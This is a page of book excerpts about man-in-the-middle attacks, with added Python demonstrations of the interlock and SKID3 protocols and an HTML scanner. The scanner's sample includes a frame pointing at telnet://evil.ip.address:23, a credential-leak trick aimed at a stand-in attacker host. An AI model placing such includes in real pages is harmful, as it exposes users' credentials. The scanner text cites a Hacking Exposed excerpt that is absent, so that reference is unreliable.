active measures, cellular automata, Claude Shannon: information theory, complexity theory, dark matter, Donald Davies, Donald Knuth, dumpster diving, Exxon Valdez, fault tolerance, finite state, invisible hand, John von Neumann, knapsack problem, MITM: man-in-the-middle, NP-complete, P = NP, packet switching, RAND corporation, RFC: Request For Comment, software patent, telemarketer, traveling salesman, Turing machine, web of trust, Zimmermann PGP

Or better yet, he can break into the database surreptitiously and substitute his key for both Alice’s and Bob’s. Then he simply waits for Alice and Bob to talk with each other, intercepts and modifies the messages, and he has succeeded. This man-in-the-middle attack works because Alice and Bob have no way to verify that they are talking to each other. Assuming Mallory doesn’t cause any noticeable network delays, the two of them have no idea that someone sitting between them is reading all of their supposedly secret communications. Interlock Protocol The interlock protocol, invented by Ron Rivest and Adi Shamir [1327], has a good chance of foiling the man-in-the-middle attack. Here’s how it works: (1) Alice sends Bob her public key. (2) Bob sends Alice his public key. (3) Alice encrypts her message using Bob’s public key. She sends half of the encrypted message to Bob. (4) Bob encrypts his message using Alice’s public key.
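Here is the interlock protocol run end to end, as an added example that is not from Applied Cryptography. It uses a deliberately simplified textbook RSA (no padding, 256-bit keys generated on the fly) purely so that the half-ciphertext mechanics are visible; it must not be used for anything real. The messages, and the attacker's behaviour when Mallory has substituted his own key for both Alice's and Bob's, are constructed for the example.

```python
"""Added example, not from Applied Cryptography: the Rivest-Shamir interlock
protocol over a deliberately simplified textbook RSA (no padding, 256-bit
keys) so the half-ciphertext mechanics are visible. Illustration only.
Messages and Mallory's behaviour are constructed for the example."""
import secrets


def is_probable_prime(n, rounds=20):
    """Miller-Rabin."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate


def rsa_keygen(bits=256):
    """Returns ((n, e), (n, d)). Textbook RSA, illustration only."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        if p != q and (p - 1) % e and (q - 1) % e:
            n = p * q
            return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))


def encrypt(pub, m):
    n, e = pub
    c = pow(int.from_bytes(m, "big"), e, n)
    return c.to_bytes((n.bit_length() + 7) // 8, "big")  # fixed length, so it splits evenly


def decrypt(priv, c):
    n, d = priv
    m = pow(int.from_bytes(c, "big"), d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def halves(c):
    return c[:len(c) // 2], c[len(c) // 2:]


def interlock(alice_msg, bob_msg, mallory=False):
    """Steps (1)-(2): public keys cross; with mallory=True Mallory substitutes
    his own for both. Steps (3)-(4): each side encrypts and sends HALF the
    ciphertext. Steps (5)-(6): the second halves follow."""
    a_pub, a_priv = rsa_keygen()
    b_pub, b_priv = rsa_keygen()
    m_pub, m_priv = rsa_keygen()
    alice_uses = m_pub if mallory else b_pub
    bob_uses = m_pub if mallory else a_pub
    a1, a2 = halves(encrypt(alice_uses, alice_msg))  # Alice's two halves
    b1, b2 = halves(encrypt(bob_uses, bob_msg))      # Bob's two halves
    # What each side gets if the halves are forwarded unchanged.
    out = {"bob_got": decrypt(b_priv, a1 + a2), "alice_got": decrypt(a_priv, b1 + b2)}
    if mallory:
        # Holding only a1, Mallory cannot recover Alice's message ...
        out["mallory_from_half"] = decrypt(m_priv, a1)
        # ... yet he has to send Bob *some* first half before a2 arrives. Once
        # it does he can read the message, but Bob already holds half of a
        # ciphertext under Mallory's key: neither forwarding a2 (bob_got) nor
        # a fresh second half encrypted to Bob makes it decrypt to Alice's text.
        out["mallory_read"] = decrypt(m_priv, a1 + a2)
        out["bob_got_reencrypted"] = decrypt(b_priv, a1 + halves(encrypt(b_pub, alice_msg))[1])
    return out
```

The protocol does not stop Mallory from eventually reading Alice's message; what it stops is his relaying it transparently, so that Bob ends up with garbage where he expected something he could check (a challenge, a password, an agreed phrase) and the interposition shows.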

SKID3 provides mutual authentication between Alice and Bob. Steps (1) through (3) are identical to SKID2, and then the protocol proceeds with:
(4) Alice sends Bob: H_K(R_B, A). A is Alice’s name.
(5) Bob computes H_K(R_B, A), and compares it with what he received from Alice. If the results are identical, then Bob knows that he is communicating with Alice.
This protocol is not secure against a man-in-the-middle attack. In general, a man-in-the-middle attack can defeat any protocol that doesn’t involve a secret of some kind.
Message Authentication: When Bob receives a message from Alice, how does he know it is authentic? If Alice signed her message, this is easy. Alice’s digital signature is enough to convince anyone that the message is authentic. Symmetric cryptography provides some authentication. When Bob receives a message from Alice encrypted in their shared key, he knows it is from Alice.
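The SKID3 exchange with both sides' messages, as an added example (not code from Applied Cryptography). HMAC-SHA256 stands in for H_K; the shared key, the names and the nonce length are constructed. The `channel` parameter models the network so that a relaying or tampering man in the middle can be placed between the two parties, which is how the remark above is demonstrated: a relaying Mallory lets both checks pass, because nothing in SKID3 ties the authentication to the channel that carries whatever follows it.

```python
"""Added example, not from Applied Cryptography: SKID3 with HMAC-SHA256 as
H_K, showing both sides' messages. Key, names and nonce length are
constructed; `channel` models the network so a man in the middle can be
inserted."""
import hashlib
import hmac
import secrets


def H_K(key, *parts):
    """H_K over the listed values; each part is length-prefixed so that
    H_K(R_B, A) cannot be confused with H_K(R_A, R_B, B) or a shifted split."""
    mac = hmac.new(key, digestmod=hashlib.sha256)
    for part in parts:
        mac.update(len(part).to_bytes(2, "big") + part)
    return mac.digest()


def skid3(alice_key, bob_key, A, B, channel=lambda msg: msg):
    """Run SKID3. Returns (Alice accepted Bob, Bob accepted Alice)."""
    # (1) Alice -> Bob: R_A
    R_A = secrets.token_bytes(8)
    R_A_at_bob = channel(R_A)

    # (2) Bob -> Alice: R_B, H_K(R_A, R_B, B)
    R_B = secrets.token_bytes(8)
    msg2 = channel(R_B + H_K(bob_key, R_A_at_bob, R_B, B))
    R_B_at_alice, tag2 = msg2[:8], msg2[8:]

    # (3) Alice recomputes H_K(R_A, R_B, B); only a holder of K can have made it
    alice_ok = hmac.compare_digest(tag2, H_K(alice_key, R_A, R_B_at_alice, B))
    if not alice_ok:
        return False, False  # Alice aborts; Bob never receives step (4)

    # (4) Alice -> Bob: H_K(R_B, A)
    msg4 = channel(H_K(alice_key, R_B_at_alice, A))

    # (5) Bob recomputes H_K(R_B, A) and compares
    bob_ok = hmac.compare_digest(msg4, H_K(bob_key, R_B, A))
    return alice_ok, bob_ok


def relay_attack(alice_key, bob_key, A, B):
    """A man in the middle who merely forwards every message. Both checks
    pass, and Mallory now sits on the path carrying whatever comes next."""
    transcript = []

    def relay(msg):
        transcript.append(msg)
        return msg

    return skid3(alice_key, bob_key, A, B, relay), transcript
```

Tampering with any message makes the corresponding check fail, so SKID3 does authenticate the parties; what it does not do is produce a session key or otherwise bind the authenticated run to the subsequent traffic.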

EKE is patented [111].
22.6 Fortified Key Negotiation
This scheme also protects key-negotiation schemes from poorly chosen passwords and man-in-the-middle attacks [47,983]. It uses a hash function of two variables that has a very special property: it has many collisions on the first variable while having effectively no collisions on the second variable.
H′(x, y) = H(H(k, x) mod 2^m, x), where H(k, x) is an ordinary hash function on k and x.
Here’s the protocol. Alice and Bob share a secret password, P, and have just exchanged a secret key, K, using Diffie-Hellman key exchange. They use P to check that their two session keys are the same (and that Eve is not attempting a man-in-the-middle attack), without giving P away to Eve.
(1) Alice sends Bob H′(P, K)
(2) Bob computes H′(P, K) and compares his result with what he received from Alice.


pages: 540 words: 103,101

Building Microservices by Sam Newman

airport security, Amazon Web Services, anti-pattern, business process, call centre, continuous integration, create, read, update, delete, defense in depth, don't repeat yourself, Edward Snowden, fault tolerance, index card, information retrieval, Infrastructure as a Service, inventory management, job automation, Kubernetes, load shedding, loose coupling, microservices, MITM: man-in-the-middle, platform as a service, premature optimization, pull request, recommendation engine, social graph, software as a service, source of truth, the built environment, web application, WebSocket

Allow Everything Inside the Perimeter Our first option could be to just assume that any calls to a service made from inside our perimeter are implicitly trusted. Depending on the sensitivity of the data, this might be fine. Some organizations attempt to ensure security at the perimeter of their networks, and therefore assume they don’t need to do anything else when two services are talking together. However, should an attacker penetrate your network, you will have little protection against a typical man-in-the-middle attack. If the attacker decides to intercept and read the data being sent, change the data without you knowing, or even in some circumstances pretend to be the thing you are talking to, you may not know much about it. This is by far the most common form of inside-perimeter trust I see in organizations. They may decide to run this traffic over HTTPS, but they don’t do much else. I’m not saying that is a good thing!

If you’re using a gateway, you’ll need to route all in-network traffic via the gateway too, but if each service is handling the integration itself, this approach should just work out of the box. The advantage here is that you’re making use of existing infrastructure, and get to centralize all your service access controls in a central directory server. We’d still need to route this over HTTPS if we wanted to avoid man-in-the-middle attacks. Clients have a set of credentials they use to authenticate themselves with the identity provider, and the service gets the information it needs to decide on any fine-grained authorization. This does mean you’ll need an account for your clients, sometimes referred to as a service account. Many organizations use this approach quite commonly. A word of warning, though: if you are going to create service accounts, try to keep their use narrow.

An alternative approach, as used extensively by Amazon’s S3 APIs for AWS and in parts of the OAuth specification, is to use a hash-based message authentication code (HMAC) to sign the request. With HMAC the request body along with a secret key shared by client and server is hashed, and the resulting hash is sent along with the request. The server then uses its own copy of the secret key and the request body to re-create the hash. If it matches, it allows the request. The nice thing here is that if a man in the middle messes with the request, then the hash won’t match and the server knows the request has been tampered with. And the secret key is never sent in the request, so it cannot be compromised in transit! Bear in mind that HMAC gives you integrity and authentication, not confidentiality: a man in the middle can still read the request unless it also travels over HTTPS. The added benefit is that this traffic can then more easily be cached, and the overhead of generating the hashes may well be lower than handling HTTPS traffic (although your mileage may vary). There are three downsides to this approach.


pages: 398 words: 120,801

Little Brother by Cory Doctorow

airport security, Bayesian statistics, Berlin Wall, citizen journalism, Firefox, game design, Golden Gate Park, Haight Ashbury, Internet Archive, Isaac Newton, Jane Jacobs, Jeff Bezos, mail merge, Mitch Kapor, MITM: man-in-the-middle, RFID, Sand Hill Road, Silicon Valley, slashdot, Steve Jobs, Steve Wozniak, Thomas Bayes, web of trust, zero day

Let him follow you around and take all the notes he wants, but steam open the envelopes that he sends back to HQ and replace his account of your movements with a fictitious one. If you want, you can make him seem erratic and unreliable so they get rid of him. You can manufacture crises that might make one side or the other reveal the identities of other spies. In short, you own them. This is called the man-in-the-middle attack and if you think about it, it's pretty scary. Someone who man-in-the-middles your communications can trick you in any of a thousand ways. Of course, there's a great way to get around the man-in-the-middle attack: use crypto. With crypto, it doesn't matter if the enemy can see your messages, because he can't decipher them, change them, and re-send them. That's one of the main reasons to use crypto. But remember: for crypto to work, you need to have keys for the people you want to talk to.

Now, the easiest way to fix this is to really widely advertise your public key. If it's really easy for anyone to know what your real key is, man-in-the-middle gets harder and harder. But you know what? Making things well-known is just as hard as keeping them secret. Think about it -- how many billions of dollars are spent on shampoo ads and other crap, just to make sure that as many people know about something that some advertiser wants them to know? There's a cheaper way of fixing man-in-the-middle: the web of trust. Say that before you leave HQ, you and your bosses sit down over coffee and actually tell each other your keys. No more man-in-the-middle! You're absolutely certain whose keys you have, because they were put into your own hands. So far, so good. But there's a natural limit to this: how many people can you physically meet with and swap keys?


pages: 1,302 words: 289,469

The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard, Marcus Pinto

call centre, cloud computing, commoditize, database schema, defense in depth, easy for humans, difficult for computers, Firefox, information retrieval, lateral thinking, MITM: man-in-the-middle, MVC pattern, optical character recognition, Ruby on Rails, Turing test, web application

It provides a wide range of functions for manipulating zombie hosts compromised via XSS, including capturing keystrokes, clipboard contents, mouse movements, screenshots, and URL history, as well as the injection of arbitrary JavaScript commands. It also remains resident within the user's browser if she navigates to other pages within the application.
Man-in-the-Middle Attacks: Earlier chapters described how a suitably positioned attacker can intercept sensitive data, such as passwords and session tokens, if an application uses unencrypted HTTP communications. What is more surprising is that some serious attacks can still be performed even if an application uses HTTPS for all sensitive data and the target user always verifies that HTTPS is being used properly. These attacks involve an "active" man in the middle. Instead of just passively monitoring another user's traffic, this type of attacker also changes some of that traffic on the fly. Such an attack is more sophisticated, but it can certainly be delivered in numerous common situations, including public wireless hotspots and shared office networks, and by suitably minded governments.

Many applications use HTTP for nonsensitive content, such as product descriptions and help pages. If such content makes any script includes using absolute URLs, an active man-in-the-middle attack can be used to compromise HTTPS-protected requests on the same domain. For example, an application's help page may contain the following: <script src="http://wahh-app.com/help.js"></script> (Chapter 15, Attacking Users: Other Techniques.) This behavior of using absolute URLs to include scripts over HTTP appears in numerous high-profile applications on the web today. In this situation, an active man-in-the-middle attacker could, of course, modify any HTTP response to execute arbitrary script code. However, because the same-origin policy generally treats content loaded over HTTP and HTTPS as belonging to different origins, this would not enable the attacker to compromise content that is accessed using HTTPS.
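Both this passage and the Hacking Exposed excerpt earlier on this page come down to one thing: an element whose src= makes the client fetch something it should not. The following added example (not code from either book) is a small scanner over HTML that flags both patterns, frames and other fetching elements whose src uses a non-web scheme such as telnet:// (the NTLM-leak trick), and scripts pulled over plain http:// into a page that is itself served over HTTPS (the active-MITM injection above). The sample documents are constructed; the host names and the port in them are placeholders.

```python
"""Added example, not code from either book: a scanner for two risky include
patterns in HTML, (a) fetching elements whose src uses a non-web scheme such
as telnet:// and (b) scripts loaded over plain http:// by an HTTPS page. The
sample documents are constructed; host names and ports are placeholders."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class IncludeScanner(HTMLParser):
    """Collect findings about src= attributes on elements that fetch content."""
    FETCHING = {"frame", "iframe", "script", "img", "embed", "object"}
    WEB_SCHEMES = {"http", "https", "data", "about"}

    def __init__(self, page_scheme="https"):
        super().__init__()
        self.page_scheme = page_scheme
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.FETCHING:
            return
        src = dict(attrs).get("src")
        if not src:
            return
        # A relative or protocol-relative src has an empty scheme and inherits
        # the page's own scheme, so it is never flagged here.
        scheme = urlsplit(src.strip()).scheme.lower()
        if scheme and scheme not in self.WEB_SCHEMES:
            self.findings.append(("non-web-scheme", tag, src))  # telnet://, file://, ...
        elif tag == "script" and scheme == "http" and self.page_scheme == "https":
            self.findings.append(("mixed-content-script", tag, src))  # replaceable by an active MITM


def scan(html_text, page_scheme="https"):
    """Return a list of (finding, tag, src) tuples for the document."""
    scanner = IncludeScanner(page_scheme)
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


# Constructed sample 1: the frameset trick from the Hacking Exposed excerpt.
EMAIL_BODY = """<html><frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet://evil.ip.address:23>
</frameset></html>"""

# Constructed sample 2: a help page with one absolute http:// script include.
HELP_PAGE = """<html><body><p>Help</p>
<script src="http://wahh-app.com/help.js"></script>
<script src="https://wahh-app.com/app.js"></script>
<script src="/local.js"></script></body></html>"""
```

Run scan() over outbound mail templates (with page_scheme="http", since the scheme question does not arise there) to catch the first pattern, and over HTTPS page sources to catch the second; the fix for the second is the same either way, a relative or https:// URL for every script include.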

Contents
Introduction xxiii
Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is Secure" 7 The Core Security Problem: Users Can Submit Arbitrary Input 9 Key Problem Factors 10 The New Security Perimeter 12 The Future of Web Application Security 14 Summary 15
Chapter 2 Core Defense Mechanisms 17 Handling User Access 18 Authentication 18 Session Management 19 Access Control 20 Handling User Input 21 Varieties of Input 21 Approaches to Input Handling 23 Boundary Validation 25 Multistep Validation and Canonicalization 28 Handling Attackers 30 Handling Errors 30 Maintaining Audit Logs 31 Alerting Administrators 33 Reacting to Attacks 34
Chapter 3
Chapter 4
Chapter 5 Bypassing Client-Side Controls 117 Transmitting Data Via the Client 118 Hidden Form Fields 118 HTTP Cookies 121 URL Parameters 121 The Referer Header 122 Opaque Data 123 The ASP.NET ViewState 124 Capturing User Data: HTML Forms 127 Length Limits 128 Script-Based Validation 129 Disabled Elements 131 Capturing User Data: Browser Extensions 133 Common Browser Extension Technologies 134 Approaches to Browser Extensions 135 Intercepting Traffic from Browser Extensions 135 Decompiling Browser Extensions 139 Attaching a Debugger 151 Native Client Components 153 Handling Client-Side Data Securely 154 Transmitting Data Via the Client 154 Validating Client-Generated Data 155 Logging and Alerting 156 Summary 156 Questions 157
Chapter 6 Attacking Authentication 159 Authentication Technologies 160 Design Flaws in Authentication Mechanisms 161 Bad Passwords 161 Brute-Forcible Login 162 Verbose Failure Messages 166 Vulnerable Transmission of Credentials 169 Password Change Functionality 171 Forgotten Password Functionality 173 "Remember Me" Functionality 176 User Impersonation Functionality 178 Incomplete Validation of Credentials 180 Nonunique Usernames 181 Predictable Usernames 182 Predictable Initial Passwords 183 Insecure Distribution of Credentials 184 Implementation Flaws in Authentication 185 Fail-Open Login Mechanisms 185 Defects in Multistage Login Mechanisms 186 Insecure Storage of Credentials 190 Securing Authentication 191 Use Strong Credentials 192 Handle Credentials Secretively 192 Validate Credentials Properly 193 Prevent Information Leakage 195 Prevent Brute-Force Attacks 196 Prevent Misuse of the Password Change Function 199 Prevent Misuse of the Account Recovery Function 199 Log, Monitor, and Notify 201 Summary 201 Questions 202
Chapter 7 Attacking Session Management 205 The Need for State 206 Alternatives to Sessions 208 Weaknesses in Token Generation 210 Meaningful Tokens 210 Predictable Tokens 213 Encrypted Tokens 223 Weaknesses in Session Token Handling 233 Disclosure of Tokens on the Network 234 Disclosure of Tokens in Logs 237 Vulnerable Mapping of Tokens to Sessions 240 Vulnerable Session Termination 241 Client Exposure to Token Hijacking 243 Liberal Cookie Scope 244 Securing Session Management 248 Generate Strong Tokens 248 Protect Tokens Throughout Their Life Cycle 250 Log, Monitor, and Alert 253 Summary 254 Questions 255
Chapter 8 Attacking Access Controls 257 Common Vulnerabilities 258 Completely Unprotected Functionality 259 Identifier-Based Functions 261 Multistage Functions 262 Static Files 263 Platform Misconfiguration 264 Insecure Access Control Methods 265 Attacking Access Controls 266 Testing with Different User Accounts 267 Testing Multistage Processes 271 Testing with Limited Access 273 Testing Direct Access to Methods 276 Testing Controls Over Static Resources 277 Testing Restrictions on HTTP Methods 278 Securing Access Controls 278 A Multilayered Privilege Model 280 Summary 284 Questions 284
Chapter 9 Attacking Data Stores 287 Injecting into Interpreted Contexts 288 Bypassing a Login 288 Injecting into SQL 291 Exploiting a Basic Vulnerability 292 Injecting into Different Statement Types 294 Finding SQL Injection Bugs 298 Fingerprinting the Database 303 The UNION Operator 304 Extracting Useful Data 308 Extracting Data with UNION 308 Bypassing Filters 311 Second-Order SQL Injection 313 Advanced Exploitation 314 Beyond SQL Injection: Escalating the Database Attack 325 Using SQL Exploitation Tools 328 SQL Syntax and Error Reference 332 Preventing SQL Injection 338 Injecting into NoSQL 342 Injecting into MongoDB 343 Injecting into XPath 344 Subverting Application Logic 345 Informed XPath Injection 346 Blind XPath Injection 347 Finding XPath Injection Flaws 348 Preventing XPath Injection 349 Injecting into LDAP 349 Exploiting LDAP Injection 351 Finding LDAP Injection Flaws 353 Preventing LDAP Injection 354 Summary 354 Questions 354
Chapter 10 Attacking Back-End Components 357 Injecting OS Commands 358 Example 1: Injecting Via Perl 358 Example 2: Injecting Via ASP 360 Injecting Through Dynamic Execution 362 Finding OS Command Injection Flaws 363 Finding Dynamic Execution Vulnerabilities 366 Preventing OS Command Injection 367 Preventing Script Injection Vulnerabilities 368 Manipulating File Paths 368 Path Traversal Vulnerabilities 368 File Inclusion Vulnerabilities 381 Injecting into XML Interpreters 383 Injecting XML External Entities 384 Injecting into SOAP Services 386 Finding and Exploiting SOAP Injection 389 Preventing SOAP Injection 390 Injecting into Back-end HTTP Requests 390 Server-side HTTP Redirection 390 HTTP Parameter Injection 393 Injecting into Mail Services 397 E-mail Header Manipulation 398 SMTP Command Injection 399 Finding SMTP Injection Flaws 400 Preventing SMTP Injection 402 Summary 402 Questions 403
Chapter 11 Attacking Application Logic 405 The Nature of Logic Flaws 406 Real-World Logic Flaws 406 Example 1: Asking the Oracle 407 Example 2: Fooling a Password Change Function 409 Example 3: Proceeding to Checkout 410 Example 4: Rolling Your Own Insurance 412 Example 5: Breaking the Bank 414 Example 6: Beating a Business Limit 416 Example 7: Cheating on Bulk Discounts 418 Example 8: Escaping from Escaping 419 Example 9: Invalidating Input Validation 420 Example 10: Abusing a Search Function 422 Example 11: Snarfing Debug Messages 424 Example 12: Racing Against the Login 426 Avoiding Logic Flaws 428 Summary 429 Questions 430
Chapter 12 Attacking Users: Cross-Site Scripting 431 Varieties of XSS 433 Reflected XSS Vulnerabilities 434 Stored XSS Vulnerabilities 438 DOM-Based XSS Vulnerabilities 440 XSS Attacks in Action 442 Real-World XSS Attacks 442 Payloads for XSS Attacks 443 Delivery Mechanisms for XSS Attacks 447 Finding and Exploiting XSS Vulnerabilities 451 Finding and Exploiting Reflected XSS Vulnerabilities 452 Finding and Exploiting Stored XSS Vulnerabilities 481 Finding and Exploiting DOM-Based XSS Vulnerabilities 487 Preventing XSS Attacks 492 Preventing Reflected and Stored XSS 492 Preventing DOM-Based XSS 496 Summary 498 Questions 498
Chapter 13 Attacking Users: Other Techniques 501 Inducing User Actions 501 Request Forgery 502 UI Redress 511 Capturing Data Cross-Domain 515 Capturing Data by Injecting HTML 516 Capturing Data by Injecting CSS 517 JavaScript Hijacking 519 The Same-Origin Policy Revisited 524 The Same-Origin Policy and Browser Extensions 525 The Same-Origin Policy and HTML5 528 Crossing Domains with Proxy Service Applications 529 Other Client-Side Injection Attacks 531 HTTP Header Injection 531 Cookie Injection 536 Open Redirection Vulnerabilities 540 Client-Side SQL Injection 547 Client-Side HTTP Parameter Pollution 548 Local Privacy Attacks 550 Persistent Cookies 550 Cached Web Content 551 Browsing History 552 Autocomplete 552 Flash Local Shared Objects 553 Silverlight Isolated Storage 553 Internet Explorer userData 554 HTML5 Local Storage Mechanisms 554 Preventing Local Privacy Attacks 554 Attacking ActiveX Controls 555 Finding ActiveX Vulnerabilities 556 Preventing ActiveX Vulnerabilities 558 Attacking the Browser 559 Logging Keystrokes 560 Stealing Browser History and Search Queries 560 Enumerating Currently Used Applications 560 Port Scanning 561 Attacking Other Network Hosts 561 Exploiting Non-HTTP Services 562 Exploiting Browser Bugs 563 DNS Rebinding 563 Browser Exploitation Frameworks 564 Man-in-the-Middle Attacks 566 Summary 568 Questions 568
Chapter 14 Automating Customized Attacks 571 Uses for Customized Automation 572 Enumerating Valid Identifiers 573 The Basic Approach 574 Detecting Hits 574 Scripting the Attack 576 JAttack 577 Harvesting Useful Data 583 Fuzzing for Common Vulnerabilities 586 Putting It All Together: Burp Intruder 590 Barriers to Automation 602 Session-Handling Mechanisms 602 CAPTCHA Controls 610 Summary 613 Questions 613
Chapter 15 Exploiting Information Disclosure 615 Exploiting Error Messages 615 Script Error Messages 616 Stack Traces 617 Informative Debug Messages 618 Server and Database Messages 619 Using Public Information 623 Engineering Informative Error Messages 624 Gathering Published Information 625 Using Inference 626 Preventing Information Leakage 627 Use Generic Error Messages 628 Protect Sensitive Information 628 Minimize Client-Side Information Leakage 629 Summary 629 Questions 630
Chapter 16 Attacking Native Compiled Applications 633 Buffer Overflow Vulnerabilities 634 Stack Overflows 634 Heap Overflows 635 "Off-by-One" Vulnerabilities 636 Detecting Buffer Overflow Vulnerabilities 639 Integer Vulnerabilities 640 Integer Overflows 640 Signedness Errors 641 Detecting Integer Vulnerabilities 642 Format String Vulnerabilities 643 Detecting Format String Vulnerabilities 644 Summary 645 Questions 645
Chapter 17 Attacking Application Architecture 647 Tiered Architectures 647 Attacking Tiered Architectures 648 Securing Tiered Architectures 654 Shared Hosting and Application Service Providers 656 Virtual Hosting 657 Shared Application Services 657 Attacking Shared Environments 658 Securing Shared Environments 665 Summary 667 Questions 667
Chapter 18 Attacking the Application Server 669 Vulnerable Server Configuration 670 Default Credentials 670 Default Content 671 Directory Listings 677 WebDAV Methods 679 The Application Server as a Proxy 682 Misconfigured Virtual Hosting 683 Securing Web Server Configuration 684 Vulnerable Server Software 684 Application Framework Flaws 685 Memory Management Vulnerabilities 687 Encoding and Canonicalization 689 Finding Web Server Flaws 694 Securing Web Server Software 695 Web Application Firewalls 697 Summary 699 Questions 699
Chapter 19 Finding Vulnerabilities in Source Code 701 Approaches to Code Review 702 Black-Box Versus White-Box Testing 702 Code Review Methodology 703 Signatures of Common Vulnerabilities 704 Cross-Site Scripting 704
Chapter 20
Technical Challenges Faced by Scanners 778 Current Products 781 Using a Vulnerability Scanner 783 Other Tools 785 Wikto/Nikto 785 Firebug 785 Hydra 785 Custom Scripts 786 Summary 789
Chapter 21 A Web Application Hacker's Methodology 791 General Guidelines 793 1 Map the Application's Content 795 1.1 Explore Visible Content 795 1.2 Consult Public Resources 796 1.3 Discover Hidden Content 796 1.4 Discover Default Content 797 1.5 Enumerate Identifier-Specified Functions 797 1.6 Test for Debug Parameters 798 2 Analyze the Application 798 2.1 Identify Functionality 798 2.2 Identify Data Entry Points 799 2.3 Identify the Technologies Used 799 2.4 Map the Attack Surface 800 3 Test Client-Side Controls 800 3.1 Test Transmission of Data Via the Client 801 3.2 Test Client-Side Controls Over User Input 801 3.3 Test Browser Extension Components 802 4 Test the Authentication Mechanism 805 4.1 Understand the Mechanism 805 4.2 Test Password Quality 806 4.3 Test for Username Enumeration 806 4.4 Test Resilience to Password Guessing 807 4.5 Test Any Account Recovery Function 807 4.6 Test Any Remember Me Function 808 4.7 Test Any Impersonation Function 808 4.8 Test Username Uniqueness 809 4.9 Test Predictability of Autogenerated Credentials 809 4.10 Check for Unsafe Transmission of Credentials 810 4.11 Check for Unsafe Distribution of Credentials 810 4.12 Test for Insecure Storage 811 4.13 Test for Logic Flaws 811 4.14 Exploit Any Vulnerabilities to Gain Unauthorized Access 813 5 Test the Session Management Mechanism 814 5.1 Understand the Mechanism 814 5.2 Test Tokens for Meaning 815 5.3 Test Tokens for Predictability 816 5.4 Check for Insecure Transmission of Tokens 817 5.5 Check for Disclosure of Tokens in Logs 817 5.6 Check Mapping of Tokens to Sessions 818 5.7 Test Session Termination 818 5.8 Check for Session Fixation 819 5.9 Check for CSRF 820 5.10 Check Cookie Scope 820 6 Test Access Controls 821 6.1 Understand the Access Control Requirements 821 6.2 Test with Multiple Accounts 822 6.3 Test with Limited Access 822 6.4 Test for Insecure Access Control Methods 823 7 Test for Input-Based Vulnerabilities 824 7.1 Fuzz All Request Parameters 824 7.2 Test for SQL Injection 827 7.3 Test for XSS and Other Response Injection 829 7.4 Test for OS Command Injection 832 7.5 Test for Path Traversal 833 7.6 Test for Script Injection 835 7.7 Test for File Inclusion 835 8 Test for Function-Specific Input Vulnerabilities 836 8.1 Test for SMTP Injection 836 8.2 Test for Native Software Vulnerabilities 837 8.3 Test for SOAP Injection 839 8.4 Test for LDAP Injection 839 8.5 Test for XPath Injection 840 8.6 Test for Back-End Request Injection 841 8.7 Test for XXE Injection 841 9 Test for Logic Flaws 842 9.1 Identify the Key Attack Surface 842 9.2 Test Multistage Processes 842 9.3 Test Handling of Incomplete Input 843 9.4 Test Trust Boundaries 844 9.5 Test Transaction Logic 844 10 Test for Shared Hosting Vulnerabilities 845 10.1 Test Segregation in Shared Infrastructures 845 10.2 Test Segregation Between ASP-Hosted Applications 845 11 Test for Application Server Vulnerabilities 846 11.1 Test for Default Credentials 846 11.2 Test for Default Content 847 11.3 Test for Dangerous HTTP Methods 847 11.4 Test for Proxy Functionality 847 11.5 Test for Virtual Hosting Misconfiguration 847 11.6 Test for Web Server Software Bugs 848 11.7 Test for Web Application Firewalling 848 12 Miscellaneous Checks 849 12.1 Check for DOM-Based Attacks 849 12.2 Check for Local Privacy Vulnerabilities 850 12.3 Check for Weak SSL Ciphers 851 12.4 Check Same-Origin Policy Configuration 851 13 Follow Up Any Information Leakage 852
Index 853

Introduction

This book is a practical guide to discovering and exploiting security flaws in web applications.


pages: 273 words: 72,024

Bitcoin for the Befuddled by Conrad Barski

Airbnb, AltaVista, altcoin, bitcoin, blockchain, buttonwood tree, cryptocurrency, Debian, en.wikipedia.org, Ethereum, ethereum blockchain, fiat currency, Isaac Newton, MITM: man-in-the-middle, money: store of value / unit of account / medium of exchange, Network effects, node package manager, p-value, peer-to-peer, price discovery process, QR code, Satoshi Nakamoto, self-driving car, SETI@home, software as a service, the payments system, Yogi Berra

Data Universal Numbering System, a government-assigned code that is unique to every business in most of the world and identifies that business for financial purposes.
2. https://en.bitcoin.it/wiki/How_to_accept_Bitcoin,_for_small_businesses#Merchant_Services
3. Black hat hackers, as opposed to white hat hackers, are hackers who have no moral qualms about profiting from and harming their targets.
4. If you don’t understand what a man-in-the-middle attack is, first, be aware that almost anything you do on the Internet is at risk of this assault, especially if you’re connecting from a public Internet connection you don’t fully control. Second, stop reading this chapter now and immediately read the Wikipedia page on this subject at https://en.wikipedia.org/wiki/Man-in-the-middle_attack.

Appendix B: Bitcoin Programming with Bitcoinj
1. The C++ reference implementation is available at https://github.com/bitcoin/bitcoin/.
2. BitcoinJ is available at http://bitcoinj.github.io/
3. https://github.com/piotrnar/gocoin/
4. https://github.com/conformal/btcd/

UPDATES
Visit http://www.nostarch.com/bitcoin for updates, errata, and other information.

